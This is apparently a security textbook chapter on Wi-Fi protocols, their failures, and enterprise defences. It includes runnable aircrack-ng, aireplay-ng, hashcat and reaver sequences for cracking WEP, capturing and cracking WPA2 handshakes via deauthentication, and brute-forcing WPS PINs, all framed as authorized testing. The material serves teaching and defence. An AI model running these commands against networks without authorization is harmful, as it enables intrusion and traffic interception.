Chapter 18: Wireless Security
"The perimeter died the day we started broadcasting our network credentials into the parking lot."
The Invisible Attack Surface
A wireless network is a radio transmitter broadcasting your network's existence in every direction -- through walls, floors, and out into the street. Anyone within range -- which for a decent directional antenna means hundreds of meters, even kilometers -- can see your network, attempt to connect, capture traffic, or create a fake version of it. A VPN helps for some things, but it does not protect the Wi-Fi layer itself.
This chapter covers how wireless security actually works, how thoroughly it has failed in the past, and what modern protocols do differently.
Radio Fundamentals for Security Engineers
Before diving into protocols, you need to understand the medium. Wired networks require physical access -- you need to plug into a port or splice a cable, and doing so leaves evidence. Wireless networks broadcast over radio frequencies. Anyone with a receiver can capture the signals. This is the fundamental challenge: the medium is shared and uncontrollable.
graph TD
subgraph Spectrum["802.11 Frequency Bands"]
B24["2.4 GHz Band<br/>Channels 1-14<br/>Longer range (100m+)<br/>More interference (microwaves, Bluetooth)<br/>Lower throughput (up to 600 Mbps)"]
B5["5 GHz Band<br/>Channels 36-165<br/>Shorter range (50m)<br/>Less interference<br/>Higher throughput (up to 3.5 Gbps)"]
B6["6 GHz Band (Wi-Fi 6E/7)<br/>Channels 1-233<br/>Shortest range (30m)<br/>Least interference<br/>Highest throughput (up to 46 Gbps)<br/>REQUIRES WPA3"]
end
subgraph Frames["802.11 Frame Types"]
MF["Management Frames<br/>Beacons, Probes, Auth, Deauth<br/>NOT encrypted in WPA2!<br/>This is exploited by deauth attacks"]
CF["Control Frames<br/>RTS, CTS, ACK<br/>Not encrypted"]
DF["Data Frames<br/>Actual user traffic<br/>Encrypted (WPA2/WPA3)"]
end
style MF fill:#ff4444,color:#fff
style DF fill:#44aa44,color:#fff
The fact that management frames are unencrypted in WPA2 is a critical design flaw. It means that deauthentication frames -- which tell a client to disconnect from a network -- can be sent by anyone. This is not a bug; it is a deliberate design choice from the original 802.11 standard that prioritized reliability over security. WPA3 partially addresses this with Protected Management Frames (PMF, 802.11w), but adoption is still incomplete.
Put a wireless adapter into monitor mode and observe the raw traffic:
\```bash
# On Linux with aircrack-ng suite installed:
# Check your wireless interface name
iwconfig
# wlan0 IEEE 802.11 ESSID:off/any
# Mode:Managed ...
# Kill processes that might interfere with monitor mode
sudo airmon-ng check kill
# Killing these processes:
# PID Name
# 723 wpa_supplicant
# 841 NetworkManager
# Start monitor mode on wlan0
sudo airmon-ng start wlan0
# PHY Interface Driver Chipset
# phy0 wlan0mon ath9k_htc Qualcomm Atheros
# Scan all channels, see all networks and clients
sudo airodump-ng wlan0mon
# Output:
# BSSID PWR Beacons #Data CH ENC CIPHER AUTH ESSID
# AA:BB:CC:DD:EE:01 -45 142 87 6 WPA2 CCMP PSK CorpNetwork
# AA:BB:CC:DD:EE:02 -62 98 23 1 WPA2 CCMP PSK GuestWiFi
# AA:BB:CC:DD:EE:03 -78 45 0 11 OPN FreeWiFi
#
# BSSID STATION PWR Packets ESSID
# AA:BB:CC:DD:EE:01 11:22:33:44:55:01 -38 234 CorpNetwork
# AA:BB:CC:DD:EE:01 11:22:33:44:55:02 -51 89 CorpNetwork
#
# You can see: access point MACs, client MACs, signal strength,
# encryption type, channel, and network names.
# ALL of this is visible to anyone within radio range.
# Focus on a specific channel and BSSID
sudo airodump-ng wlan0mon --channel 6 --bssid AA:BB:CC:DD:EE:01
# On macOS, use the built-in wireless diagnostics:
# Hold Option + click Wi-Fi icon → Open Wireless Diagnostics
# Window menu → Sniffer → select channel → Start
\```
WEP: A Masterclass in Cryptographic Failure
WEP -- Wired Equivalent Privacy -- was ratified in 1999 as part of the original 802.11 standard. Its name was aspirational: it aimed to provide privacy equivalent to a wired connection. It failed spectacularly, and the reasons why are a textbook of cryptographic mistakes. Every failure mode in WEP has been independently rediscovered in other systems. Understanding WEP teaches you how NOT to use cryptographic primitives.
How WEP Works (And Every Way It Fails)
WEP uses the RC4 stream cipher with a key constructed by concatenating a 24-bit Initialization Vector (IV) with the WEP key (40-bit or 104-bit). For each frame, it generates an RC4 keystream and XORs it with the plaintext plus a CRC-32 integrity check.
graph TD
IV["IV (24 bits)<br/>Sent in CLEARTEXT<br/>with every frame"] --> KS["RC4 Key Schedule"]
KEY["WEP Key<br/>(40 or 104 bits)<br/>Shared by all users"] --> KS
KS --> STREAM["RC4 Keystream"]
PT["Plaintext + CRC-32"] --> XOR["XOR"]
STREAM --> XOR
XOR --> CT["Ciphertext"]
IV2["IV (cleartext)"] --> FRAME["Transmitted Frame:<br/>[IV | Ciphertext]"]
CT --> FRAME
style IV fill:#ff4444,color:#fff
style KEY fill:#ff6b6b,color:#fff
Failure 1: IV space is tiny (24 bits = 16.7 million values). On a busy network generating 1,000 frames per second, all IVs are exhausted in under 5 hours. When an IV repeats, two frames are encrypted with the same keystream. XORing two ciphertexts encrypted with the same keystream cancels the keystream out, revealing the XOR of the two plaintexts. With enough collisions and some known plaintext (like ARP headers, which are predictable), the keystream can be recovered.
Failure 2: The IV is sent in the clear. An attacker can see which IV is used for each frame. They do not need to guess -- they just watch and wait for repeats. Worse, many implementations started the IV at 0 and incremented it, making collisions predictable.
Failure 3: CRC-32 is linear, not a MAC. CRC-32 is a checksum designed for error detection, not integrity protection. It is linear: CRC(A XOR B) = CRC(A) XOR CRC(B). This means an attacker can flip bits in the ciphertext AND update the CRC to match, without knowing the key. This allows targeted manipulation of encrypted data.
Failure 4: The FMS attack (Fluhrer, Mantin, Shamir, 2001). Certain IVs ("weak IVs") cause the first bytes of the RC4 keystream to be correlated with the key. By collecting frames encrypted with these weak IVs (about 5 million frames for 104-bit WEP) and performing statistical analysis, the full WEP key can be recovered. Later improvements (PTW attack, 2007) reduced the required frames to about 40,000 -- cracking WEP in under a minute on a busy network.
Crack a WEP network (for authorized penetration testing only):
\```bash
# Step 1: Start monitoring the target network
sudo airodump-ng wlan0mon --channel 6 --bssid AA:BB:CC:DD:EE:01 -w capture
# Step 2: Generate traffic (ARP replay attack to speed up IV collection)
# If there is a connected client, force it to generate ARP requests:
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:01 -h 11:22:33:44:55:01 wlan0mon
# -3 = ARP request replay
# This captures an ARP request and replays it, causing the AP to
# respond with new encrypted frames (each with a new IV)
# Step 3: Wait until you have ~40,000+ IVs (shown in airodump-ng "#Data" column)
# On a busy network, this takes 1-5 minutes
# With ARP replay, it takes under 60 seconds
# Step 4: Crack the key
sudo aircrack-ng capture-01.cap
# Opening capture-01.cap
# Read 48523 packets
# Attack will be restarted every 5000 captured IVs
# Starting PTW attack with 40521 IVs
# KEY FOUND! [ DE:AD:BE:EF:CA:FE:BA:BE:12:34:56:78:90 ]
# Decrypted correctly: 100%
# Total time: 8 seconds
# The key is the WEP password. You now have full network access.
# This is why WEP should NEVER be used. It provides no real security.
\```
WEP is completely broken. It provides no meaningful security. Any network using WEP should be treated as if it were an open network. If you discover WEP in use during a security audit, flag it as a critical finding requiring immediate remediation.
WPA2: The Current Standard
WPA (Wi-Fi Protected Access) was introduced as an emergency replacement for WEP in 2003 (TKIP-based), followed by WPA2 in 2004 (CCMP/AES-based). WPA2 has been the mandatory standard for Wi-Fi certification since 2006 and remains the most widely deployed wireless security protocol.
WPA2 Architecture
WPA2 addresses all of WEP's failures:
- AES-CCMP replaces RC4. AES is a block cipher, not a stream cipher, and CCMP (Counter Mode with CBC-MAC Protocol) provides both encryption and integrity protection using a proper MAC, not CRC-32.
- Per-session keys derived through the 4-way handshake. Even with a shared network password, each client gets unique encryption keys.
- 48-bit IV (called Packet Number in CCMP) instead of 24-bit. At 1,000 frames/second, the IV space lasts 8,925 years before repeating.
- Proper replay protection using the monotonically increasing Packet Number.
The 4-Way Handshake
The WPA2 4-way handshake is the most security-critical part of the protocol. It derives per-session encryption keys from the PMK (Pairwise Master Key, which itself is derived from the Wi-Fi password and SSID) without ever transmitting the PMK or the password.
sequenceDiagram
participant Client as Client (Supplicant)
participant AP as Access Point (Authenticator)
Note over Client,AP: Both sides already know the PMK<br/>(derived from password + SSID via PBKDF2)<br/>PMK = PBKDF2(password, SSID, 4096 iterations, 256 bits)
AP->>Client: Message 1: ANonce (AP's random nonce)
Note over Client: Client now has: PMK + ANonce + SNonce (own random nonce)<br/>Computes PTK = PRF(PMK, ANonce, SNonce, AP MAC, Client MAC)<br/>PTK contains: KCK (key confirmation) + KEK (key encryption) + TK (temporal key)
Client->>AP: Message 2: SNonce + MIC (using KCK from PTK)
Note over AP: AP now has: PMK + ANonce + SNonce<br/>Computes same PTK<br/>Verifies MIC using KCK<br/>(proves client knows the PMK)
AP->>Client: Message 3: GTK (group key, encrypted with KEK)<br/>+ MIC (using KCK) + Install PTK flag
Note over Client: Client installs PTK for unicast encryption<br/>Installs GTK for broadcast/multicast<br/>Client sends confirmation
Client->>AP: Message 4: ACK + MIC
Note over AP: AP installs PTK<br/><br/>Both sides now have identical session keys<br/>All subsequent data frames encrypted with TK<br/>Each client has UNIQUE keys despite sharing the password
Note over Client,AP: Key hierarchy:<br/>Password → PMK (PBKDF2) → PTK (4-way handshake) → TK (per-session)
Even though everyone in the office uses the same Wi-Fi password, each client gets unique encryption keys. The per-session Temporal Key (TK) is derived from the PMK plus random nonces from both sides plus both MAC addresses. Each client-AP pair has a unique TK. This means Client A cannot decrypt Client B's traffic even though they share the same password. However -- and this is important -- an attacker who knows the password CAN derive any client's PTK if they capture that client's 4-way handshake, because they can compute the PMK and then derive the PTK from the captured nonces and MAC addresses.
WPA2-PSK vs WPA2-Enterprise (802.1X/EAP)
WPA2 operates in two modes that serve fundamentally different security models:
WPA2-PSK (Pre-Shared Key, aka WPA2-Personal):
- Single password shared by all users
- PMK derived directly from password + SSID:
PMK = PBKDF2-SHA1(password, SSID, 4096, 256) - No individual user authentication -- anyone with the password has access
- Password change requires reconfiguring every device
- No way to revoke a single user's access without changing the password for everyone
- Suitable for: home networks, small offices
WPA2-Enterprise (802.1X/EAP):
- Each user authenticates with individual credentials (username/password, certificate, smart card)
- PMK derived from the EAP authentication exchange, unique per user
- User access can be individually revoked
- Supports multiple EAP methods (PEAP, EAP-TLS, EAP-TTLS)
- Requires a RADIUS server for authentication
- Suitable for: enterprises, organizations with more than ~20 users
graph TD
subgraph PSK["WPA2-PSK (Personal)"]
PSK_C["All clients share<br/>one password"]
PSK_AP["Access Point<br/>verifies password<br/>via 4-way handshake"]
PSK_C --> PSK_AP
end
subgraph Enterprise["WPA2-Enterprise (802.1X)"]
E_C["Client with<br/>individual credentials"]
E_AP["Access Point<br/>(Authenticator)"]
E_RAD["RADIUS Server<br/>(Authentication Server)"]
E_LDAP["LDAP/AD<br/>(User Directory)"]
E_C -->|"1. EAP-Start"| E_AP
E_AP -->|"2. EAP Identity Request"| E_C
E_C -->|"3. EAP Identity (username)"| E_AP
E_AP -->|"4. RADIUS Access-Request"| E_RAD
E_RAD -->|"5. Verify credentials"| E_LDAP
E_LDAP -->|"6. Valid/Invalid"| E_RAD
E_RAD -->|"7. RADIUS Accept + PMK"| E_AP
E_AP -->|"8. 4-way handshake (using PMK)"| E_C
end
style PSK fill:#ffaa00,color:#000
style Enterprise fill:#44aa44,color:#fff
**EAP Methods comparison for enterprise wireless:**
| Method | Client Auth | Server Auth | Complexity | Security |
|-----------|--------------------|-----------------------|------------|-------------|
| EAP-TLS | Client certificate | Server certificate | Highest | Strongest |
| PEAP | Username/password | Server certificate | Medium | Strong |
| EAP-TTLS | Username/password | Server certificate | Medium | Strong |
| EAP-FAST | Username/password | PAC (Cisco) | Medium | Strong |
**EAP-TLS** is the gold standard: mutual certificate authentication. Both the client and server present certificates. No passwords to phish. But deploying and managing client certificates requires a PKI infrastructure, which is a significant operational investment.
**PEAP (Protected EAP)** is the most common enterprise choice: the client authenticates with username/password inside a TLS tunnel. The server's certificate protects against rogue access points (the client verifies the RADIUS server's certificate). Most organizations use PEAP-MSCHAPv2.
**Critical configuration:** In PEAP and EAP-TTLS, the client MUST validate the RADIUS server's TLS certificate. If certificate validation is disabled (a common misconfiguration), evil twin attacks become trivial because the attacker's RADIUS server will be trusted.
The KRACK Attack (2017)
Key Reinstallation Attacks (KRACK) were discovered by Mathy Vanhoef in 2017. They are a fundamental vulnerability in the WPA2 protocol specification itself, not an implementation bug -- meaning every compliant WPA2 implementation was vulnerable.
The Mechanism
The attack targets Message 3 of the 4-way handshake. The AP retransmits Message 3 if it does not receive Message 4 (acknowledgment) from the client. The vulnerability is that when the client receives a retransmitted Message 3, it reinstalls the already-in-use session key, resetting the nonce (packet counter) to zero.
sequenceDiagram
participant Client
participant Attacker as Man-in-the-Middle<br/>(Attacker)
participant AP as Access Point
Note over Client,AP: Normal 4-way handshake begins
AP->>Client: Message 1 (ANonce)
Client->>AP: Message 2 (SNonce + MIC)
AP->>Attacker: Message 3 (GTK + MIC + Install PTK)
Attacker->>Client: Message 3 (forwarded)
Note over Client: Client installs PTK<br/>Starts encrypting with nonce = 0
Client->>Attacker: Message 4 (ACK)
Note over Attacker: BLOCK Message 4!<br/>AP never receives ACK
Client->>Attacker: Encrypted data frame (nonce = 1)
Client->>Attacker: Encrypted data frame (nonce = 2)
Note over AP: Timeout waiting for Message 4<br/>Retransmit Message 3
AP->>Attacker: Message 3 (retransmitted)
Attacker->>Client: Message 3 (forwarded again)
Note over Client: REINSTALLS PTK!<br/>Resets nonce back to 0!
Client->>Attacker: Encrypted data frame (nonce = 1 AGAIN!)
Client->>Attacker: Encrypted data frame (nonce = 2 AGAIN!)
Note over Attacker: Now has two frames encrypted with<br/>the SAME key and SAME nonce.<br/><br/>For AES-CTR (used in CCMP):<br/>XOR of two ciphertexts = XOR of plaintexts<br/><br/>For GCMP (used in WPA2-GCMP):<br/>Nonce reuse = authentication key recovery<br/>= ability to forge frames<br/><br/>For TKIP (legacy):<br/>Nonce reuse = keystream recovery<br/>= ability to inject and decrypt
The attacker does not learn the password. They force the client to reuse a nonce, which breaks the encryption's security guarantees. In AES-CTR mode (used by CCMP), nonce reuse means two frames are encrypted with the same keystream. XOR the two ciphertexts and you get the XOR of the plaintexts, which leaks content. For GCMP mode, it is even worse -- nonce reuse allows recovery of the authentication key, enabling the attacker to forge frames. For the ancient TKIP mode, nonce reuse is catastrophic -- full keystream recovery and arbitrary packet injection.
KRACK Mitigations
The fix was straightforward: do not reinstall an already-in-use key. The client should accept retransmitted Message 3 (to handle packet loss) but should not reset the nonce counter. Most operating systems were patched within weeks of disclosure (October 2017).
Lingering risk: Many IoT devices and embedded systems were never patched. Smart cameras, thermostats, medical devices, and industrial controllers running WPA2 may remain vulnerable indefinitely because they receive no firmware updates. This is one of the strongest arguments for network segmentation -- isolate IoT devices on a separate VLAN/SSID.
WPA3: The Modern Standard
WPA3 was announced in 2018 and addresses several fundamental weaknesses of WPA2. It is required for Wi-Fi 6E (6 GHz) devices and is gradually being adopted for 2.4 GHz and 5 GHz networks.
SAE: Simultaneous Authentication of Equals (Dragonfly)
The most important change in WPA3 is replacing the PSK 4-way handshake with SAE (Simultaneous Authentication of Equals), based on the Dragonfly key exchange protocol (RFC 7664).
sequenceDiagram
participant Client
participant AP as Access Point
Note over Client,AP: Both know the password.<br/>SAE derives a shared secret WITHOUT<br/>transmitting anything that can be used<br/>for offline dictionary attacks.
Note over Client,AP: Commit Exchange
Client->>AP: Commit: Scalar + Element<br/>(derived from password via<br/>hash-to-curve + random values)
AP->>Client: Commit: Scalar + Element<br/>(AP's independent values)
Note over Client,AP: Both sides independently compute<br/>the shared PMK from the exchanged values.<br/><br/>An attacker capturing this exchange<br/>CANNOT perform offline dictionary attacks.<br/>Each password guess requires an active<br/>exchange with the AP (online attack only).
Note over Client,AP: Confirm Exchange
Client->>AP: Confirm: HMAC proof of shared key
AP->>Client: Confirm: HMAC proof of shared key
Note over Client,AP: PMK established with forward secrecy.<br/>Proceed to standard 4-way handshake<br/>for session key derivation.<br/><br/>Key properties of SAE:<br/>1. Forward secrecy (past sessions stay safe<br/> even if password is later compromised)<br/>2. No offline dictionary attacks<br/>3. Protection against KRACK-style attacks
Why SAE Matters
In WPA2-PSK, anyone who captures the 4-way handshake can perform an offline dictionary attack -- trying millions of passwords per second against the captured handshake without interacting with the network. With a GPU-accelerated tool like hashcat, common passwords fall in seconds.
SAE eliminates offline dictionary attacks. The mathematical properties of the Dragonfly exchange ensure that an attacker who captures the SAE exchange cannot test password guesses offline. Each password guess requires an active, full SAE exchange with the AP, limiting attack speed to perhaps 10-100 attempts per second (limited by the AP's processing capacity and any rate limiting). This makes even weak passwords dramatically harder to crack.
Other WPA3 Improvements
**WPA3 enhancements beyond SAE:**
| Feature | WPA2 | WPA3 |
|----------------------------|-----------------------|-----------------------------|
| Key exchange | PSK (offline attacks) | SAE (no offline attacks) |
| Forward secrecy | No | Yes |
| Management frame protection| Optional (802.11w) | Mandatory (PMF required) |
| Open network encryption | None | OWE (Opportunistic Wireless Encryption) |
| Minimum cipher | CCMP-128 (AES-128) | CCMP-128 (personal), GCMP-256 (enterprise) |
| KRACK resilience | Vulnerable | Resistant by design |
**OWE (Opportunistic Wireless Encryption):** Even open networks (no password) get encryption. OWE uses an unauthenticated Diffie-Hellman exchange to establish encryption keys, providing confidentiality (no eavesdropping) without authentication (anyone can connect). This replaces the absurd situation where open Wi-Fi networks transmit all traffic in plaintext.
**WPA3-Enterprise 192-bit mode:** Uses GCMP-256 (AES-256-GCM), SHA-384 for key derivation, ECDHE with P-384 or DH group 20 for key exchange. This provides a consistent security level aligned with the Commercial National Security Algorithm (CNSA) suite for government and high-security use.
Evil Twin Attacks
An evil twin is a rogue access point that mimics a legitimate network. It has the same SSID (network name) and may use the same MAC address. When a client connects to the evil twin instead of the real AP, the attacker can intercept all traffic.
The Attack Flow
sequenceDiagram
participant Victim as Victim's Device
participant Evil as Evil Twin AP<br/>(Attacker)
participant Real as Real AP<br/>(CorpNetwork)
Note over Evil: Attacker sets up AP with:<br/>SSID: "CorpNetwork" (same name)<br/>BSSID: same or different MAC<br/>Stronger signal (closer or more power)
Note over Evil: Optional: Deauth attack against real AP<br/>forces clients to disconnect and reconnect
Evil->>Victim: Beacon: "I am CorpNetwork"<br/>(stronger signal than real AP!)
Real->>Victim: Beacon: "I am CorpNetwork"<br/>(weaker signal)
Note over Victim: Device auto-connects to<br/>strongest signal: Evil Twin
Victim->>Evil: Associate + authenticate
Note over Evil: For open networks: done.<br/>For WPA2-PSK: present captive portal<br/>asking for password.<br/>For WPA2-Enterprise: run fake RADIUS.
Victim->>Evil: All traffic flows through attacker
Evil->>Evil: Intercept, modify, inject
Evil->>Real: Forward traffic to internet<br/>(victim doesn't notice)
For WPA2-Enterprise networks, the evil twin attack is particularly effective when clients do not validate the RADIUS server's TLS certificate. The attacker runs a fake RADIUS server (e.g., using hostapd-wpe) that accepts any credentials. The victim's device sends its username and MSCHAPv2 hash, which the attacker captures and cracks offline.
Evil Twin Defenses
**Defending against evil twin attacks:**
1. **WPA2-Enterprise with strict certificate validation:** Configure clients to validate the RADIUS server's certificate against a specific CA. This prevents the client from connecting to an attacker's RADIUS server. This is the strongest defense but requires proper certificate pinning in the client configuration.
2. **802.11w (Protected Management Frames):** Prevents deauthentication attacks that force clients off the real AP. Mandatory in WPA3, optional in WPA2. Without PMF, the attacker can deauth clients from the real AP and lure them to the evil twin.
3. **Wireless Intrusion Detection Systems (WIDS):** Monitor for rogue APs with your SSID. Enterprise-grade wireless controllers (Cisco, Aruba, Meraki) include rogue AP detection that compares BSSID lists against authorized inventories.
4. **Client configuration:** Disable auto-connect for networks that are not currently in range. Remove saved networks that you no longer use. For enterprise: push Wi-Fi profiles via MDM (Mobile Device Management) with locked-down certificate validation settings.
5. **User awareness:** If your Wi-Fi asks for your password through a web page (captive portal) when it never did before, that is suspicious. Legitimate WPA2/WPA3 authentication happens at the system level, not through a browser.
Deauthentication Attacks
Deauthentication attacks exploit the fact that 802.11 management frames are unauthenticated and unencrypted in WPA2. Anyone can send a deauthentication frame that appears to come from the AP, forcing a client to disconnect.
sequenceDiagram
participant Client
participant AP as Real Access Point
participant Attacker
Note over Client,AP: Client is connected and<br/>communicating normally
Attacker->>Client: Deauth frame<br/>(spoofed as from AP's MAC)<br/>Reason: "Class 3 frame received<br/>from nonassociated STA"
Note over Client: Client believes AP disconnected it.<br/>Client drops connection.<br/>May automatically try to reconnect.
Note over Attacker: Uses for deauth attacks:<br/>1. Force reconnect to capture 4-way handshake<br/> (needed for offline PSK cracking)<br/>2. Drive clients to evil twin AP<br/>3. Denial of service (continuous deauth)<br/>4. Force client to reveal probe requests<br/> (revealing saved network names)
Capture a WPA2 4-way handshake using deauthentication (authorized testing only):
\```bash
# Terminal 1: Capture traffic on the target channel
sudo airodump-ng wlan0mon --channel 6 --bssid AA:BB:CC:DD:EE:01 -w handshake
# Terminal 2: Send deauthentication frames to force reconnection
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:01 -c 11:22:33:44:55:01 wlan0mon
# -0 5 = send 5 deauth frames
# -a = target AP BSSID
# -c = target client MAC (or omit for broadcast deauth)
# In Terminal 1, watch for "WPA handshake: AA:BB:CC:DD:EE:01"
# This means a 4-way handshake was captured
# Now crack the PSK offline using the captured handshake
# Using aircrack-ng with a wordlist:
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap
# Aircrack-ng 1.7
# [00:00:04] 23456/9822768 keys tested (5621.42 k/s)
# KEY FOUND! [ correcthorsebatterystaple ]
# Using hashcat for GPU-accelerated cracking:
# First convert capture to hashcat format:
hcxpcapngtool -o hash.22000 handshake-01.cap
# Then crack:
hashcat -m 22000 hash.22000 /usr/share/wordlists/rockyou.txt
# Speed: ~500,000 passwords/second on a single GPU
# A complex 8-character password: ~2 hours
# A simple dictionary word: seconds
# Defense: Use WPA3 (SAE prevents offline attacks)
# Defense: Use WPA2-Enterprise (no shared PSK to crack)
# Defense: Enable 802.11w (PMF) to block deauth attacks
# Defense: Use a strong, random passphrase (20+ characters)
\```
Enterprise Wireless Architecture
Large organizations need more than a single access point with a shared password. Enterprise wireless architecture involves centralized management, authentication infrastructure, and network segmentation.
graph TD
subgraph Clients["Wireless Clients"]
C1["Corporate Laptops<br/>(WPA2/WPA3-Enterprise<br/>EAP-TLS with certs)"]
C2["BYOD Devices<br/>(WPA2/WPA3-Enterprise<br/>PEAP-MSCHAPv2)"]
C3["Guest Devices<br/>(Separate SSID<br/>Captive portal)"]
C4["IoT Devices<br/>(Separate SSID/VLAN<br/>WPA2-PSK, isolated)"]
end
subgraph APs["Access Points"]
AP1["AP Floor 1"]
AP2["AP Floor 2"]
AP3["AP Floor 3"]
end
subgraph Infra["Infrastructure"]
WLC["Wireless LAN Controller<br/>(centralized management,<br/>rogue AP detection,<br/>RF management)"]
RADIUS["RADIUS Server<br/>(FreeRADIUS or NPS)<br/>Authentication"]
AD["Active Directory / LDAP<br/>User Directory"]
CA["Certificate Authority<br/>(for EAP-TLS)"]
end
subgraph Network["Network Segmentation"]
VLAN10["VLAN 10: Corporate<br/>(full access)"]
VLAN20["VLAN 20: BYOD<br/>(limited access)"]
VLAN30["VLAN 30: Guest<br/>(internet only)"]
VLAN40["VLAN 40: IoT<br/>(isolated, specific ports)"]
end
C1 --> AP1
C2 --> AP2
C3 --> AP3
C4 --> AP1
AP1 --> WLC
AP2 --> WLC
AP3 --> WLC
WLC --> RADIUS
RADIUS --> AD
RADIUS --> CA
WLC --> VLAN10
WLC --> VLAN20
WLC --> VLAN30
WLC --> VLAN40
**Enterprise wireless security best practices:**
1. **Separate SSIDs per trust level:** Corporate, BYOD, Guest, IoT. Each maps to a different VLAN with different firewall rules.
2. **WPA2/WPA3-Enterprise for all corporate access:** Never use PSK for corporate networks. PSK means one password for everyone, no individual revocation, and offline cracking attacks.
3. **EAP-TLS where possible:** Client certificates eliminate password-based attacks entirely. Deploy via MDM for managed devices.
4. **PEAP with certificate validation for BYOD:** Ensure client devices validate the RADIUS server certificate. Push Wi-Fi profiles via MDM with the CA certificate pinned.
5. **Rogue AP detection:** Enterprise wireless controllers continuously scan for unauthorized APs broadcasting your SSID. Alert on and auto-contain rogue APs.
6. **802.11w (PMF):** Enable Protected Management Frames to prevent deauthentication attacks. Required for WPA3, optional but recommended for WPA2.
7. **Dynamic VLAN assignment:** RADIUS can return a VLAN attribute based on user group membership. The same SSID can place users on different VLANs based on their identity and device posture.
8. **Network Access Control (NAC):** Check device posture (OS version, antivirus status, encryption status) before granting access. Quarantine non-compliant devices.
9. **RF shielding and power management:** Reduce AP transmission power to minimize signal leakage outside the building. Use directional antennas pointed inward.
10. **Wireless IDS/IPS:** Monitor for attack patterns: deauth floods, evil twins, client probing for unusual networks, WPS brute force.
WPS: Wi-Fi Protected Setup and Its Fatal Flaw
WPS (Wi-Fi Protected Setup) was designed to make it easy for non-technical users to connect devices to a Wi-Fi network. Press a button or enter an 8-digit PIN, and you are connected. The convenience came with a devastating security flaw.
The WPS PIN Vulnerability
The WPS PIN is 8 digits, but the last digit is a checksum, so there are only 7 digits of entropy (10 million possibilities). That alone would be crackable but slow. The fatal flaw is that the WPS protocol validates the PIN in two halves:
- The first 4 digits are validated independently (10,000 possibilities)
- The last 3 digits (plus checksum) are validated independently (1,000 possibilities)
- Total brute force: 10,000 + 1,000 = 11,000 attempts instead of 10,000,000
At 1 attempt per second (limited by AP response time), the PIN can be brute-forced in under 3 hours. Many APs do not implement rate limiting or lockout, making this attack reliable.
Test WPS vulnerability (authorized testing only):
\```bash
# Check if WPS is enabled on nearby networks
sudo wash -i wlan0mon
# BSSID Ch dBm WPS Lck Vendor ESSID
# AA:BB:CC:DD:EE:01 6 -45 2.0 No Broadcom CorpNetwork
# AA:BB:CC:DD:EE:02 1 -62 2.0 Yes Realtek HomeNetwork
# ^^^
# "No" = Not locked, vulnerable
# "Yes" = Locked after failed attempts
# Brute force the WPS PIN using Reaver
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:01 -vv
# [+] Waiting for beacon from AA:BB:CC:DD:EE:01
# [+] Associated with AA:BB:CC:DD:EE:01 (ESSID: CorpNetwork)
# [+] Trying pin 12345670
# [+] Trying pin 12345671
# ...
# [+] WPS PIN: '23456789'
# [+] WPA PSK: 'MySecretPassword123'
# [+] AP SSID: 'CorpNetwork'
#
# Time: 2 hours 47 minutes
# The WPA password is recovered through WPS, bypassing WPA2 entirely.
# Even if you have a 63-character random WPA2 passphrase,
# WPS reduces security to an 11,000-attempt brute force.
# ALWAYS disable WPS on all access points.
# Many consumer routers have WPS enabled by default.
\```
**WPS is a backdoor that bypasses your WPA2/WPA3 security entirely.** Even if your Wi-Fi password is a 63-character random string, an enabled WPS PIN reduces the attack to 11,000 attempts. Always disable WPS on all access points. Check every AP -- many consumer and SOHO routers ship with WPS enabled by default, and some cannot fully disable it (the "disable" option in the UI does not actually prevent WPS transactions at the protocol level).
Wireless Penetration Testing Methodology
Understanding the attacker's process helps you build better defenses. Here is what a professional wireless assessment looks like.
Phase 1: Reconnaissance
Conduct wireless reconnaissance:
\```bash
# Passive scanning -- just listening, not transmitting
sudo airodump-ng wlan0mon --output-format csv -w recon
# After 5-10 minutes, analyze the CSV output:
# - How many SSIDs are visible?
# - What encryption is in use? (WEP, WPA, WPA2, WPA3, Open)
# - Are there any open networks?
# - How many clients are connected to each?
# - Are there hidden SSIDs? (shown as <length: N>)
# Reveal hidden SSIDs by capturing probe requests from clients
# Clients that have previously connected will probe for the hidden SSID
sudo airodump-ng wlan0mon --channel 6 --bssid AA:BB:CC:DD:EE:01
# Look for patterns:
# - WPA2-PSK on a corporate SSID = potential offline cracking
# - WPA2-Enterprise = check for certificate validation issues
# - Open networks = check if they should be OWE or captive portal
# - WPS enabled = check with wash
# - Multiple APs with same SSID but different BSSIDs = normal (enterprise)
# - AP with your SSID but unknown BSSID = potential evil twin
\```
Phase 2: Targeted Testing
Based on reconnaissance findings, test specific vulnerabilities:
- WPA2-PSK networks: Capture 4-way handshake, attempt offline cracking with dictionaries and rules
- WPS-enabled APs: Attempt WPS PIN brute force
- WPA2-Enterprise: Deploy evil twin with fake RADIUS to test client certificate validation
- Open networks: Check for captive portal bypass, ARP spoofing potential, and unencrypted traffic
- Rogue AP detection: Test if the wireless IDS detects and alerts on unauthorized APs
Phase 3: Post-Exploitation
If access is gained:
- Scan the internal network from the wireless segment
- Test VLAN segmentation (can you reach corporate VLANs from guest?)
- Check for lateral movement opportunities
- Test DNS, DHCP, and ARP attack potential
- Verify that VPN enforcement works (can you access internal resources without VPN?)
During a wireless assessment of a financial services firm, a penetration tester found the following:
1. The corporate SSID used WPA2-PSK (not Enterprise) with the password "Summer2024!" -- it was on a whiteboard in the break room. The captured handshake was cracked in 3 seconds using a common password list.
2. WPS was enabled on 6 of their 12 access points. The WPA2 password was recovered via WPS PIN brute force in under 3 hours, confirming it was the same password.
3. Once on the corporate VLAN, the tester could reach the Active Directory domain controller, the file server, and the accounting application -- no VPN, no additional authentication. The wireless network was a flat network with no segmentation.
4. An evil twin of the guest SSID was deployed. Three employees connected and entered their corporate credentials into a fake captive portal within the first hour. None of the credentials had MFA enabled.
5. The company's "wireless security policy" documented WPA2-Enterprise with EAP-TLS. The gap between policy and reality was total.
The remediation roadmap delivered:
- Immediate: Change to WPA2-Enterprise with PEAP (migrating to EAP-TLS over 6 months)
- Immediate: Disable WPS on all APs
- Week 1: Segment corporate, guest, and IoT on separate VLANs with firewall rules
- Week 2: Deploy wireless IDS for rogue AP detection
- Month 1: Enforce MFA for all employees
- Month 3: Push Wi-Fi profiles via MDM with certificate pinning
- Month 6: Complete migration to EAP-TLS with client certificates
Total cost of remediation: approximately $85,000 (new RADIUS infrastructure, MDM licensing, PKI, consulting). Approved within 24 hours of reading the report. The alternative -- a data breach through the wireless network -- would have cost millions in their regulated industry.
Wireless Security Hardening Checklist
Every item below has a specific attack it prevents.
